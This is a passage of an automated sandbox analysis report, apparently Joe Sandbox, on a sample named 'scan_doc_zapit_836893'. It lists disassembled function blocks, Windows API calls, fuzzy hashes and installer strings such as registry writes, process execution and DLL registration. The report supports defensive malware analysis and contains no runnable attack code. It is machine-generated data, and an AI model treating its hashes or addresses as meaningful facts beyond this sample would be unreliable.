                                                      • Associated: 00000000.00000002.2162675823.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162761940.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_scan_doc_zapit_836893.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$Cursor$Item$ByteCharLoadMultiWide$AllocButtonCheckColorExecuteGlobalShelllstrlen
                                                      • String ID: @%F$N$open
                                                      • API String ID: 3928313111-3849437375
                                                      • Opcode ID: a841256503f372cb329faf737530af9fe18869c9bb3e71d47027397a25b41a99
                                                      • Instruction ID: 2c1438ad93098d7b112eeb2502b55652a68651cb38e922ac8f4fb42b83a973d4
                                                      • Opcode Fuzzy Hash: a841256503f372cb329faf737530af9fe18869c9bb3e71d47027397a25b41a99
                                                      • Instruction Fuzzy Hash: 0F71A4B1900609FFDB109F60DD45EAA7B79FB44305F00843AFA05B62D1C778A991CF99
                                                      APIs
                                                      • lstrcpyW.KERNEL32(0045B2C8,NUL,?,00000000,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE,?,00000000,000000F1,?), ref: 00406AA9
                                                      • CloseHandle.KERNEL32(00000000,000000F1,00000000,00000001,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE,?,00000000,000000F1,?), ref: 00406AC8
                                                      • GetShortPathNameW.KERNEL32(000000F1,0045B2C8,00000400), ref: 00406AD1
                                                        • Part of subcall function 00405DB6: lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DC6
                                                        • Part of subcall function 00405DB6: lstrlenA.KERNEL32(?,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DF8
                                                      • GetShortPathNameW.KERNEL32(000000F1,00460920,00000400), ref: 00406AF2
                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,0045B2C8,000000FF,0045BAC8,00000400,00000000,00000000,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE), ref: 00406B1B
                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00460920,000000FF,0045C118,00000400,00000000,00000000,?,00000000,?,00406C90,000000F1,000000F1,00000001,00406EAE), ref: 00406B33
                                                      • wsprintfA.USER32 ref: 00406B4D
                                                      • GetFileSize.KERNEL32(00000000,00000000,00460920,C0000000,00000004,00460920,?,?,00000000,000000F1,?), ref: 00406B85
                                                      • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00406B94
                                                      • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00406BB0
                                                      • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename]), ref: 00406BE0
                                                      • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,0045C518,00000000,-0000000A,0040987C,00000000,[Rename]), ref: 00406C37
                                                        • Part of subcall function 00405E50: GetFileAttributesW.KERNELBASE(00000003,004035C7,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00405E54
                                                        • Part of subcall function 00405E50: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A47,?), ref: 00405E76
                                                      • WriteFile.KERNEL32(?,00000000,?,?,00000000), ref: 00406C4B
                                                      • GlobalFree.KERNEL32(00000000), ref: 00406C52
                                                      • CloseHandle.KERNEL32(?), ref: 00406C5C
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2162625362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2162599547.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162648055.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162675823.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162675823.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162675823.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162761940.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_scan_doc_zapit_836893.jbxd
                                                      Similarity
                                                      • API ID: File$ByteCharCloseGlobalHandleMultiNamePathShortWidelstrcpylstrlen$AllocAttributesCreateFreePointerReadSizeWritewsprintf
                                                      • String ID: F$%s=%s$NUL$[Rename]
                                                      • API String ID: 565278875-1653569448
                                                      • Opcode ID: a83451b5c4aab99109613fb463f01f18261c5de4d9c28115f8397278e7cafe6e
                                                      • Instruction ID: f97e154d5ee7f709bd30e138c0dd6e282719408add8f0d739c14b832633f1bd9
                                                      • Opcode Fuzzy Hash: a83451b5c4aab99109613fb463f01f18261c5de4d9c28115f8397278e7cafe6e
                                                      • Instruction Fuzzy Hash: AE412632104208BFE6206B619E8CD6B3B6CDF86754B16043EF586F22D1DA3CDC158ABC
                                                      APIs
                                                      • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                      • BeginPaint.USER32(?,?), ref: 00401047
                                                      • GetClientRect.USER32(?,?), ref: 0040105B
                                                      • CreateBrushIndirect.GDI32(00000000), ref: 004010D8
                                                      • FillRect.USER32(00000000,?,00000000), ref: 004010ED
                                                      • DeleteObject.GDI32(?), ref: 004010F6
                                                      • CreateFontIndirectW.GDI32(?), ref: 0040110E
                                                      • SetBkMode.GDI32(00000000,00000001), ref: 0040112F
                                                      • SetTextColor.GDI32(00000000,000000FF), ref: 00401139
                                                      • SelectObject.GDI32(00000000,?), ref: 00401149
                                                      • DrawTextW.USER32(00000000,0046ADC0,000000FF,00000010,00000820), ref: 0040115F
                                                      • SelectObject.GDI32(00000000,00000000), ref: 00401169
                                                      • DeleteObject.GDI32(?), ref: 0040116E
                                                      • EndPaint.USER32(?,?), ref: 00401177
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2162625362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2162599547.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162648055.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162675823.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162675823.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162675823.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162761940.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_scan_doc_zapit_836893.jbxd
                                                      Similarity
                                                      • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                      • String ID: F
                                                      • API String ID: 941294808-1304234792
                                                      • Opcode ID: f4369597f17a3e87964d78a18e042c43d151941ad2c2ecd61bd33e0f0092c561
                                                      • Instruction ID: e7530e13063599d95e155ed3b2c7b7521dfa2668d538c4695d9c695e9582dc0d
                                                      • Opcode Fuzzy Hash: f4369597f17a3e87964d78a18e042c43d151941ad2c2ecd61bd33e0f0092c561
                                                      • Instruction Fuzzy Hash: 01516C71400209AFCB058F95DE459AF7FB9FF45311F00802EF992AA1A0CB78DA55DFA4
                                                      APIs
                                                      • RegCreateKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004028DA
                                                      • lstrlenW.KERNEL32(004130D8,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004028FD
                                                      • RegSetValueExW.ADVAPI32(?,?,?,?,004130D8,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004029BC
                                                      • RegCloseKey.ADVAPI32(?), ref: 004029E4
                                                        • Part of subcall function 004062A3: lstrlenW.KERNEL32(Sleep(4921),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                        • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                      Strings
                                                      • WriteRegDWORD: "%s\%s" "%s"="0x%08x", xrefs: 00402959
                                                      • WriteReg: error writing into "%s\%s" "%s", xrefs: 004029D4
                                                      • WriteRegStr: "%s\%s" "%s"="%s", xrefs: 00402918
                                                      • WriteRegBin: "%s\%s" "%s"="%s", xrefs: 004029A1
                                                      • WriteRegExpandStr: "%s\%s" "%s"="%s", xrefs: 0040292A
                                                      • WriteReg: error creating key "%s\%s", xrefs: 004029F5
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2162625362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2162599547.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162648055.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162675823.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162675823.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162675823.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162761940.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_scan_doc_zapit_836893.jbxd
                                                      Similarity
                                                      • API ID: lstrlen$CloseCreateValuewvsprintf
                                                      • String ID: WriteReg: error creating key "%s\%s"$WriteReg: error writing into "%s\%s" "%s"$WriteRegBin: "%s\%s" "%s"="%s"$WriteRegDWORD: "%s\%s" "%s"="0x%08x"$WriteRegExpandStr: "%s\%s" "%s"="%s"$WriteRegStr: "%s\%s" "%s"="%s"
                                                      • API String ID: 1641139501-220328614
                                                      • Opcode ID: 51d35262b0c2a2c9e21de093e360e43a16013741a0d7e0050a8341ec78c57d1d
                                                      • Instruction ID: 4ea7a0066738be70411365ddd6f3e5606018e51d84950e7919a1ab5782edcef9
                                                      • Opcode Fuzzy Hash: 51d35262b0c2a2c9e21de093e360e43a16013741a0d7e0050a8341ec78c57d1d
                                                      • Instruction Fuzzy Hash: 3D41BFB2D00209BFDF11AF90CE46DAEBBB9EB04704F20407BF505B61A1D6B94B509B59
                                                      APIs
                                                      • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,000000F0), ref: 00402EA9
                                                      • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,000000F0), ref: 00402EC5
                                                      • GlobalFree.KERNEL32(FFFFFD66), ref: 00402EFE
                                                      • WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,000000F0), ref: 00402F10
                                                      • GlobalFree.KERNEL32(00000000), ref: 00402F17
                                                      • CloseHandle.KERNEL32(?,?,?,?,?,000000F0), ref: 00402F2F
                                                      • DeleteFileW.KERNEL32(?), ref: 00402F56
                                                      Strings
                                                      • created uninstaller: %d, "%s", xrefs: 00402F3B
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2162625362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2162599547.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162648055.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162675823.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162675823.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162675823.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162761940.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_scan_doc_zapit_836893.jbxd
                                                      Similarity
                                                      • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                                      • String ID: created uninstaller: %d, "%s"
                                                      • API String ID: 3294113728-3145124454
                                                      • Opcode ID: 7d19fd18931236c609f14dd9ebe02190de13aa3954742adab313f132dac73535
                                                      • Instruction ID: 876417c632a2c352b67fb01c84f3ccb8dada3a759dccfb7ac575e016526b3130
                                                      • Opcode Fuzzy Hash: 7d19fd18931236c609f14dd9ebe02190de13aa3954742adab313f132dac73535
                                                      • Instruction Fuzzy Hash: E231B272800115BBCB11AFA4CE45DAF7FB9EF08364F10023AF555B61E1CB794E419B98
                                                      APIs
                                                      • CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,004062D4,00000000), ref: 004060FE
                                                      • GetFileAttributesW.KERNEL32(0046A560,?,00000000,00000000,?,?,004062D4,00000000), ref: 0040613C
                                                      • WriteFile.KERNEL32(00000000,000000FF,00000002,00000000,00000000,0046A560,40000000,00000004), ref: 00406175
                                                      • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,0046A560,40000000,00000004), ref: 00406181
                                                      • lstrcatW.KERNEL32(Sleep(4921),00409678,?,00000000,00000000,?,?,004062D4,00000000), ref: 0040619B
                                                      • lstrlenW.KERNEL32(Sleep(4921),?,?,004062D4,00000000), ref: 004061A2
                                                      • WriteFile.KERNEL32(Sleep(4921),00000000,004062D4,00000000,?,?,004062D4,00000000), ref: 004061B7
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2162625362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2162599547.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162648055.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162675823.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162675823.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162675823.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162761940.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_scan_doc_zapit_836893.jbxd
                                                      Similarity
                                                      • API ID: File$Write$AttributesCloseHandlePointerlstrcatlstrlen
                                                      • String ID: Sleep(4921)
                                                      • API String ID: 3734993849-3001734206
                                                      • Opcode ID: db2296b131d449b30ff8990abd275774a0521ce3dbf342b3e8cfb01d18cadc82
                                                      • Instruction ID: 719ae6cd10854ac59b0cdc08190af65770ef99398ad526dd54b0ef62760a23c4
                                                      • Opcode Fuzzy Hash: db2296b131d449b30ff8990abd275774a0521ce3dbf342b3e8cfb01d18cadc82
                                                      • Instruction Fuzzy Hash: 4621F271400200BBD710AB64DD88D9B376CEB02370B25C73AF626BA1E1E77449868BAD
                                                      APIs
                                                      • GetWindowLongW.USER32(?,000000EB), ref: 00403DE4
                                                      • GetSysColor.USER32(00000000), ref: 00403E00
                                                      • SetTextColor.GDI32(?,00000000), ref: 00403E0C
                                                      • SetBkMode.GDI32(?,?), ref: 00403E18
                                                      • GetSysColor.USER32(?), ref: 00403E2B
                                                      • SetBkColor.GDI32(?,?), ref: 00403E3B
                                                      • DeleteObject.GDI32(?), ref: 00403E55
                                                      • CreateBrushIndirect.GDI32(?), ref: 00403E5F
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2162625362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2162599547.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162648055.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162675823.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162675823.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162675823.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162761940.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_scan_doc_zapit_836893.jbxd
                                                      Similarity
                                                      • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                      • String ID:
                                                      • API String ID: 2320649405-0
                                                      • Opcode ID: ac93da855729cb6ae330e7292f06b4dcfb528e6a29ab184958864ff4432b54b5
                                                      • Instruction ID: efe235911933e34786796033030fc6f48e67331b78f43f6f4bde0ddab4ebbdd0
                                                      • Opcode Fuzzy Hash: ac93da855729cb6ae330e7292f06b4dcfb528e6a29ab184958864ff4432b54b5
                                                      • Instruction Fuzzy Hash: 7D1166715007046BCB219F78DE08B5BBFF8AF01755F048A2DE886F22A0D774DA48CB94
                                                      APIs
                                                      • GetModuleHandleW.KERNEL32(00000000,00000001,000000F0), ref: 0040241C
                                                        • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                                        • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                                        • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
                                                        • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                                        • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                                        • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                                        • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                                        • Part of subcall function 004062A3: lstrlenW.KERNEL32(Sleep(4921),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                        • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                      • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 0040242D
                                                      • FreeLibrary.KERNEL32(?,?), ref: 004024C3
                                                      Strings
                                                      • Error registering DLL: Could not initialize OLE, xrefs: 004024F1
                                                      • Error registering DLL: Could not load %s, xrefs: 004024DB
                                                      • Error registering DLL: %s not found in %s, xrefs: 0040249A
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2162625362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2162599547.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162648055.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162675823.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162675823.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162675823.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162761940.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_scan_doc_zapit_836893.jbxd
                                                      Similarity
                                                      • API ID: MessageSendlstrlen$Library$FreeHandleLoadModuleTextWindowlstrcatwvsprintf
                                                      • String ID: Error registering DLL: %s not found in %s$Error registering DLL: Could not initialize OLE$Error registering DLL: Could not load %s
                                                      • API String ID: 1033533793-945480824
                                                      • Opcode ID: dad84e194389b7cbeb1d3ab4357ce8e64ef755489eaa46c5795f6130922e59d8
                                                      • Instruction ID: e967fad4df15afb35ea17a6f8951328f27fda4bee3b51f855042d01f5ead75df
                                                      • Opcode Fuzzy Hash: dad84e194389b7cbeb1d3ab4357ce8e64ef755489eaa46c5795f6130922e59d8
                                                      • Instruction Fuzzy Hash: 34219131904208BBCF206FA1CE45E9E7A74AF40314F30817FF511B61E1D7BD4A819A5D
                                                      APIs
                                                        • Part of subcall function 004062A3: lstrlenW.KERNEL32(Sleep(4921),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                        • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                        • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                                        • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                                        • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
                                                        • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                                        • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                                        • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                                        • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                                        • Part of subcall function 00405C3F: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00457278,Error launching installer), ref: 00405C64
                                                        • Part of subcall function 00405C3F: CloseHandle.KERNEL32(?), ref: 00405C71
                                                      • WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00402288
                                                      • GetExitCodeProcess.KERNEL32(?,?), ref: 00402298
                                                      • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00402AF2
                                                      Strings
                                                      • Exec: failed createprocess ("%s"), xrefs: 004022C2
                                                      • Exec: success ("%s"), xrefs: 00402263
                                                      • Exec: command="%s", xrefs: 00402241
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2162625362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2162599547.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162648055.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162675823.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162675823.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162675823.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162761940.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_scan_doc_zapit_836893.jbxd
                                                      Similarity
                                                      • API ID: MessageSendlstrlen$CloseHandleProcess$CodeCreateExitObjectSingleTextWaitWindowlstrcatwvsprintf
                                                      • String ID: Exec: command="%s"$Exec: failed createprocess ("%s")$Exec: success ("%s")
                                                      • API String ID: 2014279497-3433828417
                                                      • Opcode ID: 6d54c557fbd6fdf8dc19518642d08f2325eb4e2a9a3136ddaf8bbf3ddc9e5317
                                                      • Instruction ID: 1f9fd54ce4b92d80b15c686f19ace2d36b15c716f321f29b17dee5dd027f7fd2
                                                      • Opcode Fuzzy Hash: 6d54c557fbd6fdf8dc19518642d08f2325eb4e2a9a3136ddaf8bbf3ddc9e5317
                                                      • Instruction Fuzzy Hash: 3E11C632904115EBDB11BBE0DE46AAE3A61EF00314B24807FF501B50D1CBBC4D41D79D
                                                      APIs
                                                      • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404869
                                                      • GetMessagePos.USER32 ref: 00404871
                                                      • ScreenToClient.USER32(?,?), ref: 00404889
                                                      • SendMessageW.USER32(?,00001111,00000000,?), ref: 0040489B
                                                      • SendMessageW.USER32(?,0000113E,00000000,?), ref: 004048C1
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2162625362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2162599547.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162648055.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162675823.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162675823.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162675823.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162761940.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_scan_doc_zapit_836893.jbxd
                                                      Similarity
                                                      • API ID: Message$Send$ClientScreen
                                                      • String ID: f
                                                      • API String ID: 41195575-1993550816
                                                      • Opcode ID: e83bf87fd3d3de8100a00259917b631f02ad10d2ae0db71d55c08ccb040208c3
                                                      • Instruction ID: 7db1728360bf3821ce9645a1193633f180912fe022e8629b13ab7a69f18166cd
                                                      • Opcode Fuzzy Hash: e83bf87fd3d3de8100a00259917b631f02ad10d2ae0db71d55c08ccb040208c3
                                                      • Instruction Fuzzy Hash: C5015E7290021CBAEB00DBA4DD85BEEBBB8AF54710F10452ABB50B61D0D7B85A058BA5
                                                      APIs
                                                      • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 0040326A
                                                      • MulDiv.KERNEL32(0001A400,00000064,?), ref: 00403295
                                                      • wsprintfW.USER32 ref: 004032A5
                                                      • SetWindowTextW.USER32(?,?), ref: 004032B5
                                                      • SetDlgItemTextW.USER32(?,00000406,?), ref: 004032C7
                                                      Strings
                                                      • verifying installer: %d%%, xrefs: 0040329F
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2162625362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2162599547.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162648055.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162675823.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162675823.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162675823.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162761940.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_scan_doc_zapit_836893.jbxd
                                                      Similarity
                                                      • API ID: Text$ItemTimerWindowwsprintf
                                                      • String ID: verifying installer: %d%%
                                                      • API String ID: 1451636040-82062127
                                                      • Opcode ID: 2242266ec469d88fb33e3e049bed9c2e1137abfcadbc35e47a6ba444652a7516
                                                      • Instruction ID: 2210906da4c477318a924a5c8cf459ae641b3a2c10b729e3aa38b42dd2c8d99c
                                                      • Opcode Fuzzy Hash: 2242266ec469d88fb33e3e049bed9c2e1137abfcadbc35e47a6ba444652a7516
                                                      • Instruction Fuzzy Hash: 98014470610109ABEF109F60DD49FAA3B69FB00349F00803DFA46B51E0DB7996558B58
                                                      APIs
                                                      • lstrlenW.KERNEL32(00447240,%u.%u%s%s,?,00000000,00000000,?,FFFFFFDC,00000000,?,000000DF,00447240,?), ref: 0040444A
                                                      • wsprintfW.USER32 ref: 00404457
                                                      • SetDlgItemTextW.USER32(?,00447240,000000DF), ref: 0040446A
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2162625362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2162599547.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162648055.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162675823.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162675823.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162675823.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162761940.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_scan_doc_zapit_836893.jbxd
                                                      Similarity
                                                      • API ID: ItemTextlstrlenwsprintf
                                                      • String ID: %u.%u%s%s$@rD
                                                      • API String ID: 3540041739-1813061909
                                                      • Opcode ID: 49e77ae85f825c85ec9bd325533554715bd64ccbe848738256e3a305efe714d4
                                                      • Instruction ID: f1896056faf18a44ee7e341cc3389f256aee6b01e91544d35c55ed1e8b934206
                                                      • Opcode Fuzzy Hash: 49e77ae85f825c85ec9bd325533554715bd64ccbe848738256e3a305efe714d4
